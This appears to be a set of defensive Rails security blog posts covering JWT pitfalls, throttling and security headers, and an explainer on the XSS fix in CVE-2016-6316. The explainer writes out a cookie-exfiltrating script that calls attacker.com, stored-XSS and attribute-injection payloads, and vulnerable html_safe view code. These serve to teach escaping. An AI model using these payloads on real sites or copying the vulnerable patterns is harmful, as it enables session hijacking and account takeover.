5 Mistakes Web Developers Should Avoid When using JWTs for Authentication

This list is for you if:

  • You care about keeping your users safe and wonder what the best practices for web app authentication are.
  • You’re using or going to use JWTs (JSON Web Tokens) to perform authentication in your application.

When it comes to security, a “working” system unfortunately does not guarantee your users’ safety. This can be true regardless of the “thing” you’re using to build your authentication system, JWTs or otherwise.

JWTs have received and continue to receive a lot of positive and negative attention over the last few years. The pro-JWT camp touts benefits like statelessness, portability, a convenient interface and so on. The anti-JWT camp says JWT is a kitchen sink of crypto formats and maximizes the number of things that can go wrong.


In this post, I’ll take a pragmatic approach and attempt to draw up a list of mistakes that can be made when using JWTs for authentication, while trying my best not to make any value judgements. Think of this as a checklist to go through as you’re building authentication. Note that some of the items in this list apply regardless of if you’re using JWTs or not, and some are specific to JWTs.

Note: To keep this article short, the scenarios I’m going to focus on all involve a front-end (run on a browser), user-facing application communicating with one or more servers to perform authentication.

Not having a strategy for session invalidation or revocation

In this scenario, you have a front-end application which makes authentication requests to a server by sending it a username and password. The server verifies this username/password combination, generates a JWT and sends it back to the client. The client is then able to make further requests using the JWT, and the server verifies these requests by validating the signature on the JWT, and saves a database call that it would have otherwise had to make.

There is a problem with this approach, however. A JWT is valid as long as:

  1. It hasn’t expired yet, and
  2. It has a valid cryptographic signature

If you’re ever in a situation where you want to reject requests made with a valid JWT, you’ll need to have a strategy and corresponding infrastructure/app behaviour in place. A common scenario often cited is when a malicious account with a valid JWT needs to be blocked from making any further requests to your servers.

There are a few options at your disposal to address this particular situation if you think it’s something to be addressed. Having a low expiry period and a longer lived “refresh” token, maintaining a “deny list” in some external store, changing the signing key, and potentially others. Every option comes with its own set of trade-offs, so do take the time to research them and understand what you’re giving up and what you’re gaining.

Putting sensitive data in the JWT

A typical JWT looks like this:


Though this looks illegible, it is actually very readable because it’s a plain text JSON object encoded using base64. For every piece of information you decide to put in your JWT, ask yourself: How much damage would it cause if this gets into the wrong hands?

Two common remediations for having sensitive data in the JWT are:

  1. Stop putting sensitive data in there.
  2. If you really need to have sensitive data, encrypt your JWT.

Needless to say, there are trade-offs with both approaches, which neccessitates you having a good think about what your requirements are. For example, with option 1, you might have to change your application architecture and perhaps incur a lookup cost. Option 2 on the other hand, adds the complexity of having to encrypt something and thinking about where and how it will be decrypted.

Not guarding against CSRF (cross-site request forgery)

In this scenario, your front-end app stores the JWT in a cookie (with no protections on it) and your server authenticates requests by parsing the cookie and performing a JWT validation check on it. If a user has your app open in a browser tab and happens upon a malicious web site in another tab, this web site can make authenticated requests to your web app because the browser will automatically include any cookies associated with your web app’s domain. This is known as cross-site request forgery, and you’ll want to guard against it. A common solution is for your server to include a CSRF token in its responses and require that any requests made to it also contain a matching token, the main idea being that a malicious script would have no way of knowing what this token is and therefore have its requests blocked.

If you’re using a framework like Rails or Express, the chances are high that the framework will include options that you can use to protect your users against CSRF, using one or more of the ways detailed in the Wikipedia link above.

Related: You’ll also want to set the httpOnly and secure flags on your cookies. httpOnly prevents malicious scripts from accessing and potentially exfiltrating the contents of your JWT (in the context of an XSS attack) and secure ensures that cookies will not be sent across the wire unless the https protocol is being used.

Storing the JWT in local storage

Since cookies typically have a 4kb storage limit, you might reason that a JWT that contains more information could be stored in local storage instead.

Local storage is not protected against XSS

If you have an XSS vulnerability, a malicious script could easily exfiltrate the contents of local storage to anywhere it chooses to, allowing the attacker to impersonate the user at their convenience. A common counterpoint to this argument is that in the event of an XSS attack against an app that stores its JWT in a cookie, an attacker would still be able to make authenticated requests since httpOnly and secure do nothing to prevent this. This is true, but it is arguably more secure because it limits the attacker to carrying out specific attacks only when the user is actively using the app, or has it open in a tab somewhere.

I’d bias towards choosing the more secure option in this case (and also do my best not to introduce XSS vulnerabilities!).

Choosing an asymmetric encryption algorithm without a good reason

I’m not a security expert, so take this point with a grain of salt. From the research I’ve done so far, RSA (the most commonly used crypto algorithm to asymmetrically sign JWTs) is hard to get right and can have subtle implementation bugs. Cryptographers with way more knowledge than me have recommended against it

Unless you have a really good reason for choosing asymmetric/public key encryption, choose HS256 (HMAC-SHA256) as your algorithm. If you’re building a system where a third party needs to be able to validate a signature but not be able to generate one (what folks typically use asymmetric encryption in a web app for), consider an API where the third party can ask the secret holder if a given signature is valid.

Also don’t allow “None” as one of the algorithm choices 🙂

To learn more about how these algorithms work and how they can be exploited, I highly recommend the cryptopals challenges!

Happy learning and building! As always, let me know what you think in the comments below. If you liked what you read, make sure to drop your email in the form below and I’ll send you new articles when I write them.

Recommended Reading

I highly recommend giving these a read to further understand what could go wrong when using JWTs, so you’re best prepared to understand the trade-offs and design/build a secure system.

4 Ways to Secure Your Authentication System in Rails

Authentication frameworks in Ruby on Rails can be somewhat of a contentious topic. Take Devise, one of the more popular options, for example. Critics of Devise point out, perhaps rightly so, that there is a lack of clear documentation, that it is hard to understand, hard to customize and wonder if we wouldn’t be better off using a different gem or even rolling our own custom authentication system. Advocates of Devise, on the other hand, point out that Devise is the result of years of expert hard work and that by rolling your own, you’d forego much of the security that comes with using a highly audited piece of software. If you’re new to this conversation, you might ask yourself why you would even need Devise if, like in the Hartl Rails tutorial or the RailsCast on implementing an authentication system from scratch, you can just use has_secure_password and expire your password reset tokens (generated with SecureRandom) within a short enough time-period.

Is there something inherently insecure in the authentication systems described in the Hartl tutorial and the RailsCasts? Should a gem like Devise be used whenever your app needs to authenticate its users? Does using a gem like Devise mean that your authentication is now forever secure?

Like in most areas of software, the answer is that it depends. Authentication does not exist in isolation from the rest of your app and infrastructure. This can mean that even if your authentication system is reasonably secure, weaknesses in other areas of your app can lead to your users being compromised. Conversely, you might be able to get away with less than optimum security in your authentication system if the rest of your app and infrastructure pick up the slack.

The only way you, an app developer, can answer these questions satisfactorily is to deepen your understanding of security and authentication in general. This will help you as you make the tradeoffs that will inevitably arise when you are building and/or securing your app.

Whether you want to use Devise (or a similar third party gem like Clearance) or roll your own auth, here are 4 specific ways you can make authentication in your app more secure. Though your mileage may vary, I hope at the very least one of them gives you something to think about.

Throttle Requests

The easiest thing an attacker can do to compromise your users is to guess their login credentials with a script. Users won’t always choose good passwords, so given enough time, an attacker’s script will likely be able to compromise a significant number of your users just by making a large number of guesses based on password lists.

You can make it hard for attackers to do this by restricting the type and number of requests that can be made to your app within a predefined time period. The gem rack-attack, for example, is a Rack middleware that gives you a convenient DSL with which you can block and throttle requests.

Let’s say you just implemented the Hartl tutorial and you now want to add some throttling, you might do something like this after installing rack-attack:

throttle('req/ip', :limit => 300, :period => 5.minutes) do |req|

The above piece of code tells Rack::Attack to limit any given IP to at most 300 total requests every 5 minute period. You’ll notice that since the block above receives a request object, we can technically throttle requests based on any arbitrary request parameter.

While this limits a single IP from making too many requests, attackers can get around this by using multiple IP’s to bruteforce a user’s account. To slow this type of attack down, you might consider throttling requests per account. For example:

throttle("logins/email", :limit => 5, :period => 20.seconds) do |req|
  if req.path == '/login' && req.post?
    req.params['email'].presence # this will return the email if present, and nil otherwise

If you’re using Devise, you also have the option to “lock” accounts if there are too many unsuccessful attempts to log in. You can also implement a lockout feature by hand. However, there is a flip side to locking and/or throttling on a per-account basis – attackers can now restrict access to arbitrary user accounts by forcing them to lock out, which is a form of a “Denial of Service” attack. In this case, there is no easy answer. When it comes to choosing security mechanisms for your app, you’ll have to decide how much and what type of risk you’re willing to take on. Here is an old StackExchange post that might be a good starting point for further research

A note about Rack::Attack and DDoS attacks: Before actually implementing a throttle, you’ll want to use Rack::Attack's “track” feature to get a better idea of what traffic looks like to your web server. This will help you make a more informed decision about throttling parameters. Aaron Suggs, the creator of Rack::Attack, says it is a complement to other server-level security measures like iptables, nginx limit_conn_zone and others.

DoS and DDoS attacks are vast topics in their own right so I’d encourage you to dig deeper if you’re interested. I’d also recommend looking into setting up a service like Cloudflare to help mitigate DDoS attacks.

Set up your security headers correctly

Even though you probably serve requests over HTTPS, you might be vulnerable to a particular type of Man in the Middle attack known as SSL Stripping. To illustrate, imagine you lived in Canada and bank with the Bank of Montreal. One day, you decide to email money to someone and type “bmo.com” into the address bar in Chrome. If you had dev tools open and on the “Network” tab, you’d notice that the first request to bmo.com is made via http, instead of https. A suitably situated attacker could have intercepted this request and begun to serve you a spoofed version of the BMO website (making you divulge login information and what not), and they’d have been able to do this only because your browser used http, instead of https.

The Strict-Transport-Security header is meant to prevent this type of attack. By including the Strict-Transport-Security header (aka the HTTP Strict Transport Security or HSTS header) in its response, a server can tell a browser to only communicate with it via https. The HSTS header usually specifies a max-age parameter and the browser equates the value of this parameter to how long it should use https to communicate with the server. So, if max-age was set to 31536000, which means one year, the browser would only communicate with the server via https for a year. The HSTS header also lets your server specify if it wants the browser to talk via https on its subdomains as well. See here & here for further reading.

To make this happen in Rails, do config.force_ssl = true. This will ensure that the HSTS header is set to a value of 180.days. To apply https to all your subdomains, you can do config.ssl_options = {hsts: {subdomains: true}}.

The loophole in this is that the first ever request to the server might still be made via http. The HSTS header protects all requests except the first one. There is a way to have the browser always use https for your site, even before the user has actually visited, and that is by submitting your domain to be included in the Chromium preload list. The “disadvantage” with the preload approach is that you will never ever be able to serve info via http on your domain.

Having HSTS enabled doesn’t mean your users will be absolutely safe, but I’d wager they’d be considerably safer with it than without.

If you’re curious, you can quickly check what security related headers (of which HSTS is one) your server responds with on securityheaders.io. I advise looking into all the headers here to learn and decide if they apply to your situation or not.

Read authentication libraries (Devise, Authlogic, Clearance, Rodauth and anything else you have access to)

This especially applies if you’re rolling your own, but even if you don’t you can learn a lot from how another gem does a similar thing. You don’t always have to read the source code itself to learn. The change logs and update blog posts from maintainers can be just as informative, because they often go into detail about vulnerabilities that were discovered and the steps taken to mitigate them. Here are three things I learned from Rodauth and Devise that you might find intriguing:

Restricted Password Hash Access (Rodauth)

Unlike Devise and most “roll your own auth” examples, Rodauth uses a completely separate table to store password hashes, and this table is not accessible to the rest of the application. Rodauth does this by setting up two database accounts, app and ph. Password hashes are stored in a table that only ph has access to, and app is given access to a database function that uses ph to check if a password hash matches a given account. This way, even if an SQL injection vulnerability exists in your app, an attacker will not be able to directly access your users’ password hashes.

User Specific Tokens (Rodauth)

Rodauth not only stores password reset and other sensitive tokens in separate tables, it also prepends every token with an account ID. Imagine your forgot password link looked something like ‘www.example.com/reset_password?reset_password_token=abcd1234’ and an attacker was trying to guess a valid token. The attacker’s guess could potentially be a valid token for any user. If we prepend the token with an account ID (maybe the token looks like reset_password_token=<account_id>-abcd1234), then the attacker can only attempt to brute force their way in to one user account at a time.

Digesting Tokens (Devise)

Devise, since version 3.1 came out a few years ago, digests password reset, confirmation and unlock tokens before storing them in the database. It does so by first generating a token with SecureRandom and then digesting it with the OpenSSL::HMAC.hexdigest method. In addition to protecting the tokens from being read in the event that an attacker is able to access the database, digesting tokens in this manner also protects them against timing attacks since it would be near impossible for an attacker to control the string being compared enough to make byte-by-byte changes.

If you want to know more about Rodauth, check out their github page and also watch this talk by Jeremy Evans, its creator.

To summarize, the more you know about how other popular authentication frameworks approach authentication and the steps they take to avoid being vulnerable to attack, the more confident you can be in assessing the security of your own authentication set up.

Secure the Rest of Your App

Authentication does not stand in isolation. Vulnerabilities in the rest of your app have the potential to bypass any security measures you might have built into your authentication system.

Let’s consider a Rails app with a Cross Site Scripting (XSS) vulnerability to illustrate. Imagine the XSS vulnerability exists because there’s an html_safe in the codebase somewhere that unfortunately takes in a user input. Now, because our app is a Rails (4+) app, we have the httpOnly flag set on our cookie by default, which means any Javascript an attacker is able to inject won’t have access to document.cookie. Though it might seem like our app is safe from session highjacking attacks, our attacker can still do a bunch of things that compromise a user’s session. For example, they can inject Javascript that makes an AJAX request to change the user’s password. If the password change form requires the current password, they can try to change the user’s email (to their own) and initiate a password reset flow.

In short, an XSS vulnerability sort of makes it irrelevant how secure your authentication is, and the same can be said of other vulnerabilities like Path Traversal or CSRF.

Learning about security vulnerabilities and then applying that knowledge to attack your own app is a great way to, over the long term, write more secure code. I’d also encourage you to read through resources like the Rails Security Guide and security checklists like this and this.


Shameless Plug: If you’re within a few hours flight from Toronto, I’d love to come talk to you and your team about security, free of charge. Get in touch with me at sidk(AT)ducktypelabs(DOT)com for more info.

The above list is not meant to to be comprehensive, and what I’ve left out can probably fill multiple books. However, I hope I’ve given you a few things to think about and that you’re able to take away at least one thing that will make your app more secure.

I’d love to hear from you! Post in the comments section below – what do you do to secure your auth?

Do I really need to patch my Rails apps? (Understanding CVE-2016-6316)

Ruby and Rails security advisories, without exception, recommend that you upgrade your Rails app as soon as possible. Unfortunately, the descriptions of the problem being solved can be cryptic, and it can be hard to assess if you really need to do the upgrade. If you’re strapped for time, it can seem like a good plan to postpone upgrades and avoid extra work like fixing breaking tests.

Note: By “upgrade” in this article, we mean a ‘minor’ or a ‘patch’ upgrade. For example an upgrade from Rails to

In this article, we’re going to look at Rails, which fixes CVE-2016-6316. The aims of this article are:

  1. To go over the basics of XSS vulnerabilities, how they can be exploited, and ways to mitigate them.
  2. To increase your understanding about the specific problem being solved with the Rails release which fixes CVE-2016-6316 – an XSS vulnerability in ActionView and,
  3. Help you come to a conclusion on whether you should upgrade or not

What is an XSS Vulnerability?

“XSS” stands for cross-site scripting. When your application has an XSS vulnerability, attackers can run malicious Javascript on your users’ browsers. For example, consider a Javascript snippet like the following:

var i = new Image;
i.src = "http://attacker.com/" + document.cookie;

The above snippet, when run on a user’s browser, will cause the browser to make a request to attacker.com and send over the user’s cookie. Using this cookie, the attacker can proceed to hijack the user’s session and gain unauthorized access to secured areas of your app.

Types of XSS Vulnerabilities

There are three major varieties of XSS:

Reflected XSS

A reflected XSS vulnerability arises when user input contained in a request is immediately reflected in the web application’s response. Exploiting a reflected XSS vulnerability involves crafting a request containing embedded Javascript that is reflected to any user who makes the request.

Stored XSS

A Stored XSS vulnerability arises when data submitted by one user (the attacker) is stored in the application and is then displayed to other users without being sanitized properly.

DOM-based XSS

DOM-based XSS vulnerabilities arise when client-side Javascript extracts data contained in a request’s URL or the response’s HTML (accessible via the DOM) to dynamically update the page’s contents. Exploiting a DOM-based XSS vulnerability involves crafting a request URL containing embedded Javascript such that the client-side Javascript injects the malicious Javascript into the DOM and causes its execution.

Read this OWASP page for more info on the three types of XSS

For the purposes of this article, we will focus on Stored XSS.

How to attack a Stored XSS Vulnerability?

Let’s consider an example to illustrate how such a vulnerability can arise and how an attacker can take advantage of it.

A Vulnerable Rails app

Consider a typical Rails app, with users and admins. A user record has three fields – name, email and introduction. Each user has a profile page where this information is listed. Admins in the system, in addition to being able to access these profile pages, also have access to a /users page which consolidates all the users’ information. The view code for this page starts out looking something like this:

<% #This is accessible only to admins %>
<% User.all.each do |user| %>
  <%= user.name %>
  <%= user.email %>
  <%= user.introduction %>
<% end %>

Now let’s say we want to give our users the ability to customize their introductions with HTML. So instead of typing in "I'm awesome!!" in the introduction field, they can type in "I'm <strong>awesome!!</strong>". To accomplish this in our view, we make use of the html_safe helper and change user.introduction to user.introduction.html_safe. Now, if a user submits text with HTML in it, our view will render the HTML.

Enter Attacker

An attacker can take advantage of this HTML rendering and submit something like this in the introduction field:

I am awesome!!
  var i = new Image;
  i.src = "http://attacker.com/" + document.cookie;

and have this stored in the database. Now, whenever an admin logs in and visits the /users page, the above script will run and the attacker will see the admin’s cookie in their server logs. Using this cookie, they can proceed to log in as the admin and further their agenda (malicious though it may be).

Another way to introduce XSS vulnerabilities with html_safe

The above example illustrates one straightforward way by which an XSS vulnerability can be introduced with html_safe. That is, using html_safe directly on user inputs because we want to give users the ability to customize how their input renders.

Another way using html_safe can cause XSS vulnerabilities to sneak up on you is when you find yourself needing to incorporate styling on strings which are derived from user input. Going back to our example Rails app’s /users page, let’s say we’ve installed Font Awesome and we want to provide admins a nicely styled link to a given user’s profile page. We might do something like this in our view:

<% User.all.each do |user| %>
  <%= link_to "<i class='fa fa-user'></i> #{user.name}".html_safe, users_profile_path(user) %>
  <%= user.email %>
  <%= user.introduction %>
<% end %>

As in the previous example, this opens our admin’s account up to XSS attacks. By submitting javascript in the name field, an attacker can proceed to gain access to the admin’s account.

But I need to use html_safe. How can I protect my app?

The key is to use html_safe only on trusted strings, because it is an assertion. You can concatenate a string which is html_safe with a string which is not and be assured that the string which is not html_safe will be escaped properly. So for example, we can do:

<%= link_to "<i class='fa fa-user'></i> ".html_safe + "#{user.name}", users_profile_path(user) %>

which will ensure that user.name is properly escaped. So if we pass in a string like "Bob Foo<script>alert(document.cookie)</script> to name, our HTML will look something like:

<a href='...'><i class='fa fa-user'></i> Bob Foo&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a>

instead of:

<a href='...'><i class='fa fa-user'></i> Bob Foo <script>alert(document.cookie)</script></a>

which will prevent the Javascript from running.

The sanitize helper is another useful option. With sanitize, you can specify exactly what HTML tags and attributes you want to render and have it automatically reject anything else.

Rails Views have XSS Protections

Rails (from version 3 onwards), by default, will escape any content in your views unless you specify that they are html_safe (either directly by calling html_safe on a string or indirectly with sanitize). ActionView helpers like content_tag or link_to also will, by default, escape strings that are passed in to them.


As it turns out, inserting <script> tags into places where they won’t be escaped is just one of the many ways to exploit an XSS vulnerability. You (or an attacker) can also take advantage of the fact that Javascript can be called directly via HTML attributes such as onclick, onmouseover and others.

Let’s take a brief look at content_tag to examine how this can work in practice. Rails provides the content_tag helper to programmatically generate HTML tags. For example, to generate a div tag, you’d do something like this:

content_tag(:div, "hi")

which in HTML would translate to:


You can pass in additional parameters to content_tag to specify tag attributes. So if we wanted to add a title attribute, we could say something like:

content_tag(:div, "hi", title: "greeting")

which in HTML would translate to:

<div title="greeting">hi</div>

Now, let’s say for some reason, our app has this title attribute tied to a user input. Meaning, if our user input is foo, the HTML generated by content_tag would be:

<div title="foo">hi</div>

Assuming that there is no XSS protection enabled on content_tag, how would we exploit this?

We could send in a string like "onmouseover="alert(document.cookie), which would result in HTML like the following:

<div title="" onmouseover="alert(document.cookie)">

The key character in our example input is the first double-quote character ". This double-quote, because it is not escaped, is treated by the browser as a closing quote and makes it so that the characters after the double-quote are treated as valid HTML.

Rails, by default, will escape double-quotes, even in helpers like content_tag. Where CVE-2016-6316 comes in though, is when we mark our inputs to helpers like content_tag as html_safe.

Let’s say we’re passing in user input from our controller to the view with the @user_input instance variable, and our call to content_tag looks like:

<%= content_tag(:div, 'hi', title: @user_input) %>

If an attacker tries to pass in a string like "onmouseover=..., Rails will automatically escape the double quotes and prevent the XSS attack.

However, prior to Rails, if for some reason we marked the user input as html_safe:

<%= content_tag(:div, 'hi', title: @user_input.html_safe) %>

then this would allow double-quotes to be rendered in the HTML without being escaped. Which, as we’ve seen allows an attacker to execute arbitrary Javascript.

The Rails patch ensures that even if you mark an attribute in a tag helper as html_safe, double quotes will be escaped.

So, should I upgrade?

The easy and correct answer is yes, you should upgrade. Especially if the upgrades involve security patches. Even if the upgrades don’t involve security patches, you should upgrade so that future security patches are easier to apply.

That being said, I think it depends on how far away your version of Rails is from the most recently released patch. The closer you are, the easier the upgrade process will be. Security patches in general are designed not to cause breaking changes in your codebase, but that applies only if you’re at the most recent patch already.

If you’re strapped for time, it would behoove you to understand the problems that security advisories and related patches fix, so you can assess for yourself if your codebase is at risk and apply any mitigations necessary.


The most important thing you can do is to keep yourself aware of security advisories as and when they are released, and patch your app ASAP. Here’s how you can accomplish that:

Use bundler-audit. This somewhat automates the process of keeping an eye on security mailing lists, but the onus is on you to regularly run this gem and keep it updated (with bundle-audit update). If you use CI, a good step would be to integrate running bundle-audit as part of your CI process.

When bundler-audit flags a gem as being out of date, upgrade the gem either with bundle update <gem-name> or if you have to, manually changing the version in Gemfile.lock.

If you have the time, look into the security advisory that you just patched and use that as an excuse to learn more about that particular class of vulnerabilities.

Have you patched your Rails app recently? If so, how did that process go for you? What would you like to learn about security in Rails? Let me know in the comments below!

Shout-out: Thanks to Chris Drane for suggesting this article, and to Gabriel Williams at Cloud City for reviewing it!